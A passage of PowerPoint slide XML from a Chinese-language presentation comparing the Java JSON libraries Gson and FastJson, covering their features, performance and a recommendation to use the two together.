                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>自行研发而来，但自从在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>年五月公开发布第一版后已被许多公司或用户应用。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Gson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的应用主要为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>toJson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fromJson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>两个转换函数，无依赖，不需要例外额外的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>jar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，能够直接跑在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JDK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>上。而在使用这种对象转换之前需先创建好对象的类型以及其成员才能成功的将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">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字符串成功转换成相对应的对象。类里面只要有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>方法，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Gson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>完全可以将复杂类型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">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到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>bean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>bean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">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的转换，是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">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解析的神器。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Gson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在功能上面无可挑剔，但是性能上面比</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>FastJson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>有所差距。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20734660"/>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593429"/>
            <a:ext cx="9499666" cy="1251544"/>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zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>各个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>技术的简介和优劣</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1C3267"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="2210574"/>
            <a:ext cx="22360260" cy="8586966"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>FastJson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（项目地址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/alibaba/fastjson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Fastjson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>语言编写的高性能的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">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处理器</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由阿里巴巴公司开发。无依赖，不需要例外额外的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>jar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，能够直接跑在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JDK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>上。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>FastJson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在复杂类型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Bean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>转换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">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上会出现一些问题，可能会出现引用的类型，导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">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转换出错，需要制定引用。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>FastJson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>采用独创的算法，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的速度提升到极致，超过所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">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库</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lgn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>总结</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在项目选型的时候可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Gson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>和阿里巴巴的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>FastJson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>两种并行使用</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:b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如果只是功能要求，没有性能要求，可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Gson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:b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如果有性能上面的要求可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Gson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>bean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>转换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">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确保数据的正确，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>FastJson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>转换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Bean</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290804742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48380"/>
            <a:ext cx="9499666" cy="11416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zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>各个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>技术的简介和优劣</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1C3267"/>
              </a:solidFill>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3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030682" y="2402143"/>
            <a:ext cx="17396743" cy="8275689"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18750116" y="2908224"/>
            <a:ext cx="5633884" cy="7171194"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
